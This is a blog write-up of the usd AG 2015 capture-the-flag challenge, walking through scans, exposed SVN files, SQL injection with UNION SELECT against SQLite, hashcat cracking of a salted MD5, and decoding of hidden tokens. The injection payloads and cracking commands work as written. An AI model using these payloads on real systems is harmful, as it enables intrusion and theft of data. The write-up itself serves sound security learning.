usd AG Hacker challenge 2015 - Solutions

usd AG has announced a hacking challenge I have participated at. The target system was available at http://82.195.79.41/. Now let me sum up thg steps that have been required in order to get all 6 tokens.

In [122]:
Expand Code

Scratch the surface

Let's first conduct a nmap scan to see which ports are open.

In [6]:
%%bash
nmap -A -T4 82.195.79.41
Starting Nmap 6.47 ( http://nmap.org ) at 2015-03-18 20:57 CET
Nmap scan report for 82.195.79.41
Host is up (0.053s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
| http-robots.txt: 2 disallowed entries 
|_/no/one/will/ever/know/ /~freddy/
|_http-title: usd Hackertag Challenge Website
7777/tcp open  ssh     OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 c6:62:55:12:32:5d:d9:15:bc:1e:51:77:0e:5a:96:ea (RSA)
|_  256 22:f9:96:0c:2e:99:11:17:d0:a8:89:41:40:b6:3d:58 (ECDSA)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.70 seconds

So we have 2 disallowed entries. Let's have a look:

In [9]:
!curl http://82.195.79.41//no/one/will/ever/know/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /no/one/will/ever/know</title>
 </head>
 <body>
<h1>Index of /no/one/will/ever/know</h1>
<table><tr><th><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr><tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[DIR]"></td><td><a href="/no/one/will/ever/">Parent Directory</a></td><td>&nbsp;</td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="secret.txt">secret.txt</a></td><td align="right">04-Mar-2015 15:23  </td><td align="right"> 14 </td><td>&nbsp;</td></tr>
<tr><th colspan="5"><hr></th></tr>
</table>
</body></html>

First token

If you pay attention you'll see a secret.txt in that directory:

In [8]:
!curl http://82.195.79.41//no/one/will/ever/know/secret.txt
Token: 928191

Bingo! Ok what about ~freddy:

In [14]:
!curl http://82.195.79.41/~freddy/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /~freddy</title>
 </head>
 <body>
<h1>Index of /~freddy</h1>
<table><tr><th><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr><tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[DIR]"></td><td><a href="/">Parent Directory</a></td><td>&nbsp;</td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><th colspan="5"><hr></th></tr>
</table>
</body></html>

OK, nothing to see here. BUT: We keep in mind that freddy is probably a local username.

2nd token

The nmap results suggested that there is a HTTPD on port 80. Let's see what nikto finds:

In [16]:
!nikto -host http://82.195.79.41/ -C all
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          82.195.79.41
+ Target Hostname:    82.195.79.41
+ Target Port:        80
+ Start Time:         2015-03-18 20:07:20 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache
+ Uncommon header 'x-frame-options' found, with contents: sameorigin
+ Server leaks inodes via ETags, header found with file /robots.txt, inode: 131873, size: 68, mtime: 0x511175d9c5600
+ OSVDB-3268: /no/one/will/ever/know/: Directory indexing found.
+ File/dir '/no/one/will/ever/know/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /~freddy/: Directory indexing found.
+ File/dir '/~freddy/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-3092: /.svn/entries: Subversion Entries file may contain directory listing information.
+ OSVDB-3092: /.svn/wc.db: Subversion SQLite DB file may contain directory listing information.
+ 6545 items checked: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2015-03-18 20:19:17 (GMT1) (717 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Besides thet robots.txt entries .svn looks very interesting. Let's have a closer look:

In [6]:
con = sqlite3.connect("wc.db")
In [8]:
pd.read_sql("SELECT local_relpath, checksum FROM NODES", con)
Out[8]:
local_relpath checksum
0 download.php $sha1$71d7c4326159dff73464c31c8b8f3ee0aad3a805
1 None

Obviously there is a download.php which we can retrieve from the SVN repo. Using the tutorial one can access the files inside the repository very easily:

In [9]:
!curl http://82.195.79.41/.svn/pristine/71/71d7c4326159dff73464c31c8b8f3ee0aad3a805.svn-base
<?php
include "src/header.php";
// Todo: Challenge fuer Token 102342 bauen.
echo '
        <div id="contentliquid"><div id="content">
           <p>Die folgende Datei steht zum Download bereit:</p>
	<ul>
	<li><a href="dl/usd_Hackertag_2015.pdf">usd Hackertag Poster (PDF-Format)</a></li>
	</ul>
';

echo "</div></div>";
include "src/menu.php";
include "src/footer.php";
?>

There is this line:

Todo: Challenge fuer Token 102342 bauen.

3rd Token

Now let's have a look at the PDF under http://82.195.79.41/download.php.

hackertag

In [11]:
!file usd_Hackertag_2015.pdf
usd_Hackertag_2015.pdf: PDF document, version 1.3

When you look at it (PDF viewer) nothing special about it.

hackertag

Let's extract all available strings:

In [13]:
!strings usd_Hackertag_2015.pdf | tail -n 20
/ModDate (D:20150220100358+01'00')
/Producer (Adobe PDF library 10.01)
/Title (usd Hackertag 2015)
/Trapped /False
/Subject (Token: 338912)
endobj
xref
0000000000 65535 f
0000608444 00000 n
0000651051 00000 n
trailer
/Size 44
/Root 6 0 R
/Info 4 0 R
/ID [ <B86554FD3FAA6D459E2C0B3D46980BDB> <f302C8F15AC3244B86122640F6B03D76> ]
/Prev 116
%EndExifToolUpdate 608422
startxref
651378
%%EOF

Again bingo: Token: 338912

4th Token

Now let's have a look at the main web-page. Somewhere you'll see this line:

<script type="text/javascript" src="http://82.195.79.41/js/jquery/jquery.js"></script>

But wait a sec. JQuery? That sounds suspicious.

In [17]:
!curl http://82.195.79.41/js/jquery/jquery.js
eval(String.fromCharCode(105, 102, 32, 40, 119, 105, 110, 100, 111, 119, 46, 108, 111, 99, 97, 116, 105, 111, 110, 46, 104, 111, 115, 116, 110, 97, 109, 101, 32, 61, 61, 32, 34, 49, 50, 55, 46, 48, 46, 48, 46, 49, 34, 41, 32, 123, 10, 118, 97, 114, 32, 95, 48, 120, 98, 55, 57, 97, 61, 91, 34, 92, 120, 53, 55, 92, 120, 54, 57, 92, 120, 54, 67, 92, 120, 54, 67, 92, 120, 54, 66, 92, 120, 54, 70, 92, 120, 54, 68, 92, 120, 54, 68, 92, 120, 54, 53, 92, 120, 54, 69, 92, 120, 50, 48, 92, 120, 55, 65, 92, 120, 55, 53, 92, 120, 55, 50, 92, 120, 70, 67, 92, 120, 54, 51, 92, 120, 54, 66, 92, 120, 50, 48, 92, 120, 54, 54, 92, 120, 55, 50, 92, 120, 54, 53, 92, 120, 54, 52, 92, 120, 54, 52, 92, 120, 55, 57, 92, 120, 50, 69, 92, 120, 50, 48, 92, 120, 52, 52, 92, 120, 54, 53, 92, 120, 55, 50, 92, 120, 50, 48, 92, 120, 54, 55, 92, 120, 54, 53, 92, 120, 54, 56, 92, 120, 54, 53, 92, 120, 54, 57, 92, 120, 54, 68, 92, 120, 54, 53, 92, 120, 50, 48, 92, 120, 53, 52, 92, 120, 54, 70, 92, 120, 54, 66, 92, 120, 54, 53, 92, 120, 54, 69, 92, 120, 50, 48, 92, 120, 54, 67, 92, 120, 54, 49, 92, 120, 55, 53, 92, 120, 55, 52, 92, 120, 54, 53, 92, 120, 55, 52, 92, 120, 51, 65, 92, 120, 50, 48, 92, 120, 51, 52, 92, 120, 51, 49, 92, 120, 51, 55, 92, 120, 51, 56, 92, 120, 51, 53, 92, 120, 51, 53, 34, 93, 59, 97, 108, 101, 114, 116, 40, 95, 48, 120, 98, 55, 57, 97, 91, 48, 93, 41, 59, 10, 125));
In [40]:
char_codes = !curl http://82.195.79.41/js/jquery/jquery.js
In [41]:
# Convert char codes to string
char_codes = char_codes[5][25:-3].split(',')
string_message = ''.join(chr(int(i)) for i in char_codes)
string_message
Out[41]:
'if (window.location.hostname == "127.0.0.1") {\nvar _0xb79a=["\\x57\\x69\\x6C\\x6C\\x6B\\x6F\\x6D\\x6D\\x65\\x6E\\x20\\x7A\\x75\\x72\\xFC\\x63\\x6B\\x20\\x66\\x72\\x65\\x64\\x64\\x79\\x2E\\x20\\x44\\x65\\x72\\x20\\x67\\x65\\x68\\x65\\x69\\x6D\\x65\\x20\\x54\\x6F\\x6B\\x65\\x6E\\x20\\x6C\\x61\\x75\\x74\\x65\\x74\\x3A\\x20\\x34\\x31\\x37\\x38\\x35\\x35"];alert(_0xb79a[0]);\n}'
In [64]:
# Decode hex string to ascii
hex_code = string_message[61:-23].replace('\\x', '')
binascii.unhexlify(hex_code)
Out[64]:
b'Willkommen zur\xfcck freddy. Der geheime Token lautet: 417855'

Our found token: 417855

5th Token

I must say this part of the challenge was the most "challenging" one. The found vulnerability was actually obvious but it took me to long to exploit it :D But first a short introduction to the vulnerability itself.

There was this link http://82.195.79.41/liste.php?id=1 which caught my attention from the beginning.

hackertag

The first thing I did:

In [75]:
!curl "http://82.195.79.41/liste.php?id=1'" 2> /dev/null | tail -n 1
<div id="contentliquid"><div id="content">unrecognized token: "'1'';"

Aha.. Ok. Let's try again:

In [82]:
!curl "http://82.195.79.41/liste.php?id=1'%20OR 1=1" 2> /dev/null | tail -n 1
<div id="contentliquid"><div id="content">unrecognized token: "';"

What about the next one?

In [89]:
!curl "http://82.195.79.41/liste.php?id=NULL'%20UNION%20ALL%20SELECT%20'a','k';--#" 2> /dev/null | tail -n 20
<div id="contentliquid"><div id="content"><ul><li><a href="/liste.php?id=a">k</a><ul></div></div>
        <div id="leftcolumn">
	<ul>
	<li><a href="http://82.195.79.41/index.php">Startseite</a></li>
	<li><a href="http://82.195.79.41/liste.php">Todo-Liste</a></li>
	<li><a href="http://82.195.79.41/restricted/index.php">Backend</a></li>
	<li><a href="http://82.195.79.41/download.php">Downloads</a></li>
	<li><a href="http://www.usd.de/impressum/" target="_blank">Impressum</a></li>
	<li><a href="http://www.usd.de/datenschutz/" target="_blank">Datenschutz</a></li>
	</ul>
        </div>

        <div id="footer">
            <p></p>
        </div>
    </div>
</body>
</html>


Have you noticed this line?

<div id="contentliquid"><div id="content"><ul><li><a href="/liste.php?id=a">k</a><ul></div></div>

a and b were successfully "merged" into the results. Now the biggest problem I had was the fingerprinting of the DB itself. OWASP has sth you can use in your tests. But the most useful thing is to test for string concatenation (nice article here). So I've tried several things:

In [91]:
!curl "http://82.195.79.41/liste.php?id=NULL'%20UNION%20ALL%20SELECT%20CONCAT('a', 'b'),'k';--#" 2> /dev/null | grep "contentliquid"
<div id="contentliquid"><div id="content">unrecognized token: "';"
In [93]:
!curl "http://82.195.79.41/liste.php?id=NULL'%20UNION%20ALL%20SELECT%20'a'+'b','k';--#" 2> /dev/null | grep "contentliquid"
<div id="contentliquid"><div id="content"><ul><li><a href="/liste.php?id=a">k</a><ul></div></div>
In [94]:
!curl "http://82.195.79.41/liste.php?id=NULL'%20UNION%20ALL%20SELECT%20'a'||'b','k';--#" 2> /dev/null | grep "contentliquid"
<div id="contentliquid"><div id="content"><ul><li><a href="/liste.php?id=ab">k</a><ul></div></div>

Well 'a'||'b' seemed to work. That syntax is Oracle specific. But also SQLite specific. And this was my biggest mistake: I was searching for Oracle specific injections, but the DBMS was in fact SQLite. Finally I've constructed this query:

In [99]:
!curl "http://82.195.79.41/liste.php?id=NULL'%20UNION%20ALL%20SELECT%20'a',name%20FROM%20sqlite_master;--#" 2> /dev/null | grep "contentliquid"
<div id="contentliquid"><div id="content"><ul><li><a href="/liste.php?id=a">token</a><li><a href="/liste.php?id=a">public</a><ul></div></div>

So there are 2 tables available:

  • token
  • public

Let's have a look at the schema of token:

In [101]:
!curl "http://82.195.79.41/liste.php?id=NULL'%20UNION%20ALL%20SELECT%20'a',sql%20FROM%20sqlite_master%20WHERE%20name='token';--#" 2> /dev/null | grep "contentliquid"
<div id="contentliquid"><div id="content"><ul><li><a href="/liste.php?id=a">CREATE TABLE token (token_val NUMERIC)</a><ul></div></div>

Ok, now go for it:

In [102]:
!curl "http://82.195.79.41/liste.php?id=NULL'%20UNION%20ALL%20SELECT%20'a',token_val%20FROM%20token;--#" 2> /dev/null | grep "contentliquid"
<div id="contentliquid"><div id="content"><ul><li><a href="/liste.php?id=a">336809</a><ul></div></div>

Token 336809 is the next one.

6th and last Token

While looking for tokens, I have seen this message a couple of times:

hackertag

The realm says: 80 is just a number of 65535. Ok hat was a hint for more undetected ports. I've run nmap again:

# nmap -sT -p 0-65535 82.195.79.41
...
Nmap scan report for 82.195.79.41
Host is up (0.036s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE
80/tcp   open  http
4141/tcp open  oirtgsvc
7777/tcp open  cbt

Nmap done: 1 IP address (1 host up) scanned in 2485.52 seconds

OH! What's behind port 4141?

In [105]:
!nc 82.195.79.41 4141
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddxKMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddxKMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWKxc:l0WMMMMMMMMMMMMMM
dddddddddddddddddddddddxdddddddddddddddddddddddddddddddddddddddddddddddddddddxKMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWNWMMMMM0:......o0NMMMMMMMMMMMM
dddddddddddddddxxxxdddddddxxxxxddddddddddddddddddddddddddddddxO00kdddddddddddxKMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM0,',;cdOl..........';cdNMMMMMMMM
ddddddddddddddxKNNOdddddddOXNXkdddddddddddddddddddddddddddddxxXMMKxddddddddddxKMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNc....:Kk;............'KMMMMMMMM
ddddddddddddddxNMW0dddddddOWMNkddddddddddddddddddddddddddddddxXMMKdddddddddddxKMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNx;...lO0xc,.........cWMMMMMMMM
ddddddddddddddxNMW0dddddddOWMNkdddxxkO000OkxddddddxkO000kxxdxxXMMKdddxO00OxddxKMMN00XWNKKKXNWWWXKKKNWMMMMMMWXKKKXNWMMMMMMMMMMMMMMMMMX:....:xKKxl,......kMMMMMMMMM
ddddddddddddddxNMW0dddddddOWMNkddxOXWWWNWWWXkxddx0NWWWWWWN0xxxXMMKxdkKWWXOxddxKMMKddxkxxxxxx00kxxxdxONMMMWKkxxxxxxONMMMMMMMMMMMMMMMN0::;....,ckKKkoc:;dNMMMMMMMMM
ddddddddddddddxNMMNKKKKKKKXWMNkddxKXXOxxkKWMNkdx0WWKOxxkXWW0dxXMMKxkNMW0xddxdxKMMKddkKNWNKxdxOXNNNOdd0WMWOxx0NWNKkdkNMMMMMMMMMMMMWK00OOkoo:'...';ldxxl;dXMMMMMMMM
ddddddddddddddxNMMNXXXXXXXNWMNkddddxkkOOO0NMWOdkNMXxddddxkOkdxXMMWXWMNOxdddxdxKMMKddONMMMWOxxKMMMMKxdkWMXxdx00000kxx0WMMMMMMMMMWNK00000000Okdc,.........;OWMMMMMM
ddddddddddddddxNMW0ddddxddOWMNkddkKNWNXXXXWMWOdONMKxdddddxxxdxXMMNKXMWKxdddxdxKMMKddONMMMWOddKMMMMKxdkWMKddxO0000000XWMMMMMMMMMWNK00000000000Okxdxdlc:;;;cXMMMMMM
ddddddddddddddxNMW0dddddddOWMNkxxKMMKxddxONMWOdxXMNkddxxk00OdxXMMKdxXWMXkxdxdxKMMKddONMMMWOddKMMMMKxdkWMXxdxXMMMMMMMMMMMMMMMMMMMMMWN00000000O00O0WMMMMMWWMMMMMMMM
ddddddddddddddxNMW0dddddddOWMNkdd0WMN000KXWMWOddkNWNK00KNMNOdxXMMKddx0NMW0xddxKMMKddONMMMWOddKMMMMKxdkWMMKkxk0KKK0OKWMMMMMMMMMMMMMMWK000000000KWNWMMMMMMMMMMMMMMM
ddddddddddddddx0KKkdddddddkKK0kdxxOKXNXXOx0KKOdddx0KXNNXK0kddxOKKOdxddkKKKkxdxKMMN00KWMMMMK00XMMMMN0OKWMMMWX0OkkOO0XWMMMMMMMMMMMMMMWK000000000NMMMMMMMMMMMMMMMMMM
ddddddddddddddddddddddddddddddddxddxxxxxddddddddddddxxxxddddddddxddddddddddddxKMMMMMMMMMMMMMMMWXXNNWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWK000000000WMMMMMMMMMMMMMMMMMM
ddddddddddddddx0kxdkOOxddddddddddddddddddddddddddddddddddddddddddddddddddddddxKMMMMMMMMMMMMMMWK0000KWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMX00000000KWMMMMMMMMMMMMMMMMMM
ddddddddddddddxOkxkNX0xddxxxddxxxddxxxxddxxxdxxxxdddddxxxxdxdxxxxddxxxxxxddddxKMMMMMMMMMMMMMMN000000KXNWMMMMMMMMMMMMMMMMMMMMMMMMMMMMW00000KK0d:cdKWMMMMMMMMMMMMMM
ddddddddddddddkXOkKWX0xxdkKKxd0Kkx0XKKKOxOXkdkXKxdddx0KKKKOxOKKKKOxOXKKXXkdddxKMMMMMMMMMMMMMMMWNNXK00c'ckNMMMMMMMMMMMMMMMMMMMMMMMMMMMNKKXXXx,.....:kNMMMMMMMMMMMM
ddddddddddddddkN0dON0xdddxONOkX0xON0xxKNk0NOdkNXxdddON0xk0Oxk0OOXXx0NOx0WKxddxKMMMMMMMMMMMMMMMMMMMMNk,...;dKWMMMMMMMMMMMMMMMMMMMMMMMMNKO0Kd.........;0WMMMMMMMMMM
ddddddddddddddkN0dON0xddddx0XKXkxONOxxKNk0NOdkNXxdddONOxxOkkXXO0NXx0NkdOWKxddxKMMMMMMMMMMMMMMMMMMMMMMNOo:...cxKWMMMMMMMMMMMMMMMWNKkoc;ckol:'..........ckKNWMMMMMM
ddddddddddddddkXOdkX0xdddddkNWOddx0XKXXOxxKXKKNKxddxx0XKXXOkKXKKXKx0XkdONKxddxKMMMMMMMMMMMMMMMMMMMMMMMMMWKxc...:ONMMMMMMMMWXOdl;.......'..,clc,..........':dOKWMM
ddddddddddddddxxxxxxxddddxk0X0xddddxxxxdddxxxxxxxddddxxxxxdxxxxxxxxxxxdxxxdddxKMMMMMMMMMMMMMMMMMMMMMMMMMMMMMXOd;.':dkkxoc;,......';:ldkOOo,.';lol:,'..........,co
dddddddddddddddddddddddddxkkxddddddddddddddddddddddddddddddddddddddddddddddddxKMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWKxc'.....',:lox0XNWMMMMMMMNo,..';odddol:;,,,,'...
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddxKMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNKOO0KNWWMMMMMMMMMMMMMMMMNOc'..,:ldxdddddddooo
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxKMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWK:....;oddddxxdxxK

*********************************************************
Der folgende Hashwert (MD5) wurde mit dem Salt "Hackertag" erzeugt. 
Der Aufruf war dabei wie folgt: echo -n "Hackertag{Passwort}" | md5sum

d79a2543ddbb8042a6d14851fb098e0d

*********************************************************

hackertag

What it basically says, is that a certain MD5 hash was created using echo -n "Hackertag{Password}", where Hackertag is a salt. And given the hash I should find out the right password. I have never used hashcat before but this was the right time to do it. After reading some docs, I was able to get the right password in ca. 3 seconds :)

In [107]:
%%bash
echo "d79a2543ddbb8042a6d14851fb098e0d" > hash
hashcat -m 0 --attack-mode 3 hash 'Hackertag?l?l?l?l?l?l'
Initializing hashcat v0.49 with 2 threads and 32mb segment-size...

Added hashes from file hash: 1 (1 salts)
Activating quick-digest mode for single-hash

NOTE: press enter for status-screen


Input.Mode: Mask (H) [1]
Index.....: 0/1 (segment), 1 (words), 0 (bytes)
Recovered.: 0/1 hashes, 0/1 salts
Speed/sec.: - plains, - words
Progress..: 1/1 (100.00%)
Running...: --:--:--:--
Estimated.: --:--:--:--


Input.Mode: Mask (Ha) [2]
Index.....: 0/1 (segment), 1 (words), 0 (bytes)
Recovered.: 0/1 hashes, 0/1 salts
Speed/sec.: - plains, - words
Progress..: 1/1 (100.00%)
Running...: --:--:--:--
Estimated.: --:--:--:--


Input.Mode: Mask (Hac) [3]
Index.....: 0/1 (segment), 1 (words), 0 (bytes)
Recovered.: 0/1 hashes, 0/1 salts
Speed/sec.: - plains, - words
Progress..: 1/1 (100.00%)
Running...: --:--:--:--
Estimated.: --:--:--:--


Input.Mode: Mask (Hack) [4]
Index.....: 0/1 (segment), 1 (words), 0 (bytes)
Recovered.: 0/1 hashes, 0/1 salts
Speed/sec.: - plains, - words
Progress..: 1/1 (100.00%)
Running...: --:--:--:--
Estimated.: --:--:--:--


Input.Mode: Mask (Hacke) [5]
Index.....: 0/1 (segment), 1 (words), 0 (bytes)
Recovered.: 0/1 hashes, 0/1 salts
Speed/sec.: - plains, - words
Progress..: 1/1 (100.00%)
Running...: --:--:--:--
Estimated.: --:--:--:--


Input.Mode: Mask (Hacker) [6]
Index.....: 0/1 (segment), 1 (words), 0 (bytes)
Recovered.: 0/1 hashes, 0/1 salts
Speed/sec.: - plains, - words
Progress..: 1/1 (100.00%)
Running...: --:--:--:--
Estimated.: --:--:--:--


Input.Mode: Mask (Hackert) [7]
Index.....: 0/1 (segment), 1 (words), 0 (bytes)
Recovered.: 0/1 hashes, 0/1 salts
Speed/sec.: - plains, - words
Progress..: 1/1 (100.00%)
Running...: --:--:--:--
Estimated.: --:--:--:--


Input.Mode: Mask (Hackerta) [8]
Index.....: 0/1 (segment), 1 (words), 0 (bytes)
Recovered.: 0/1 hashes, 0/1 salts
Speed/sec.: - plains, - words
Progress..: 1/1 (100.00%)
Running...: --:--:--:--
Estimated.: --:--:--:--


Input.Mode: Mask (Hackertag) [9]
Index.....: 0/1 (segment), 1 (words), 0 (bytes)
Recovered.: 0/1 hashes, 0/1 salts
Speed/sec.: - plains, - words
Progress..: 1/1 (100.00%)
Running...: --:--:--:--
Estimated.: --:--:--:--


Input.Mode: Mask (Hackertag?l) [10]
Index.....: 0/1 (segment), 26 (words), 0 (bytes)
Recovered.: 0/1 hashes, 0/1 salts
Speed/sec.: - plains, - words
Progress..: 26/26 (100.00%)
Running...: --:--:--:--
Estimated.: --:--:--:--


Input.Mode: Mask (Hackertag?l?l) [11]
Index.....: 0/1 (segment), 676 (words), 0 (bytes)
Recovered.: 0/1 hashes, 0/1 salts
Speed/sec.: - plains, - words
Progress..: 676/676 (100.00%)
Running...: --:--:--:--
Estimated.: --:--:--:--


Input.Mode: Mask (Hackertag?l?l?l) [12]
Index.....: 0/1 (segment), 17576 (words), 0 (bytes)
Recovered.: 0/1 hashes, 0/1 salts
Speed/sec.: - plains, - words
Progress..: 17576/17576 (100.00%)
Running...: --:--:--:--
Estimated.: --:--:--:--

d79a2543ddbb8042a6d14851fb098e0d:Hackertagblue

All hashes have been recovered

Input.Mode: Mask (Hackertag?l?l?l?l) [13]
Index.....: 0/1 (segment), 456976 (words), 0 (bytes)
Recovered.: 1/1 hashes, 1/1 salts
Speed/sec.: - plains, 5.03M words
Progress..: 296192/456976 (64.82%)
Running...: --:--:--:--
Estimated.: --:--:--:--

Started: Wed Mar 18 21:45:47 2015
Stopped: Wed Mar 18 21:45:47 2015

We can verify that:

In [108]:
!echo -n "Hackertagblue" | md5sum
d79a2543ddbb8042a6d14851fb098e0d  -

Perfect! Now we can use the passwort to access this link: http://82.195.79.41/restricted/index.php. Inside you'll see a image and nothing more:

hackertag

But again let's have a look at the image itself:

In [117]:
%%bash
curl --user freddy:blue http://82.195.79.41/restricted/tour.jpg -o tour.jpg 2> /dev/null
strings tour.jpg | grep "=="
VG9rZW46IDU1MTI0Mw==

That looks interesting:

In [119]:
!echo "VG9rZW46IDU1MTI0Mw==" | base64 -d
Token: 551243

That's it! :)


Prev: The iOS 8.1.3 fiasco
Next: Coming back to C/C++ after 2 years

comments powered by Disqus
Published:
2015-03-18 00:00
category:
Tag:
ctf10